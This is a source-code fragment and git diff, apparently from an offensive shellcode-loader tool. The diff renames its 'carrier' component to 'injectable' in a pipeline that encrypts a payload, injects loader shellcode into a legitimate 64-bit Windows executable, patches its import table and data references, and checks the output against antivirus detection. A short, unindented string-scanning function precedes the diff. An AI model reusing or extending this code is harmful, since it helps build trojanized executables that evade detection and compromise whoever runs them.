current_string = bytearray()
start_offset = None # To keep track of the start of the current string
for i in range(0, len(data) - 1, 2):
# Check if we have a valid character
if data[i] != 0 or data[i+1] != 0:
if start_offset is None: # Mark the start of a new string
start_offset = i
current_string += bytes([data[i], data[i+1]])
else:
if len(current_string) >= min_len * 2: # Check if the current string meets the minimum length
return start_offset # Return the offset where the string starts
current_string = bytearray()
start_offset = None # Reset start offset for the next string
return None # No string found that meets the criteria
+12 -7
View File
@@ -17,7 +17,7 @@ from model.project import Project, prepare_project
from model.settings import Settings from model.settings import Settings
from model.defs import * from model.defs import *
from log import setup_logging from log import setup_logging
from model.carrier import DataReuseEntry from model.injectable import DataReuseEntry
from utils import check_deps from utils import check_deps
@@ -142,7 +142,7 @@ def start_real(settings: Settings):
project.init() project.init()
# CHECK if 64 bit # CHECK if 64 bit
if not project.carrier.superpe.is_64(): if not project.injectable.superpe.is_64():
raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in)) raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in))
logger.info("--[ Config: {} {} {} {}".format( logger.info("--[ Config: {} {} {} {}".format(
@@ -169,8 +169,8 @@ def start_real(settings: Settings):
# PREPARE DataReuseEntry for usage in Compiler/AsmTextParser # PREPARE DataReuseEntry for usage in Compiler/AsmTextParser
# So the carrier is able to find the payload # So the carrier is able to find the payload
project.carrier.add_datareuse_fixup(DataReuseEntry("supermega_payload", in_code=True)) project.injectable.add_datareuse_fixup(DataReuseEntry("supermega_payload", in_code=True))
entry = project.carrier.get_reusedata_fixup("supermega_payload") entry = project.injectable.get_reusedata_fixup("supermega_payload")
entry.data = phases.assembler.encode_payload( entry.data = phases.assembler.encode_payload(
project.payload.payload_data, settings.decoder_style) # encrypt project.payload.payload_data, settings.decoder_style) # encrypt
observer.add_code_file("payload", project.payload.payload_data) observer.add_code_file("payload", project.payload.payload_data)
@@ -180,12 +180,12 @@ def start_real(settings: Settings):
phases.compiler.compile( phases.compiler.compile(
c_in = settings.main_c_path, c_in = settings.main_c_path,
asm_out = settings.main_asm_path, asm_out = settings.main_asm_path,
carrier = project.carrier, injectable = project.injectable,
settings = project.settings) settings = project.settings)
# we have the carrier-required IAT entries in carrier.iat_requests # we have the carrier-required IAT entries in carrier.iat_requests
# CHECK if all are available in infectable, or abort (early check) # CHECK if all are available in infectable, or abort (early check)
functions = project.carrier.get_unresolved_iat() functions = project.injectable.get_unresolved_iat()
if len(functions) != 0 and settings.fix_missing_iat == False: if len(functions) != 0 and settings.fix_missing_iat == False:
raise Exception("IAT entry not found: {}".format(", ".join(functions))) raise Exception("IAT entry not found: {}".format(", ".join(functions)))
@@ -197,7 +197,12 @@ def start_real(settings: Settings):
observer.add_code_file("carrier_shc", carrier_shellcode) observer.add_code_file("carrier_shc", carrier_shellcode)
# INJECT loader into an exe and do IAT & data references. Big task. # INJECT loader into an exe and do IAT & data references. Big task.
phases.injector.inject_exe(carrier_shellcode, settings, project.carrier, project.payload) injector = phases.injector.Injector(
carrier_shellcode,
settings,
project.injectable,
project.payload)
injector.inject_exe()
#observer.add_code_file("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300)) #observer.add_code_file("exe_final", extract_code_from_exe_file_ep(settings.inject_exe_out, 300))
# Check binary with avred # Check binary with avred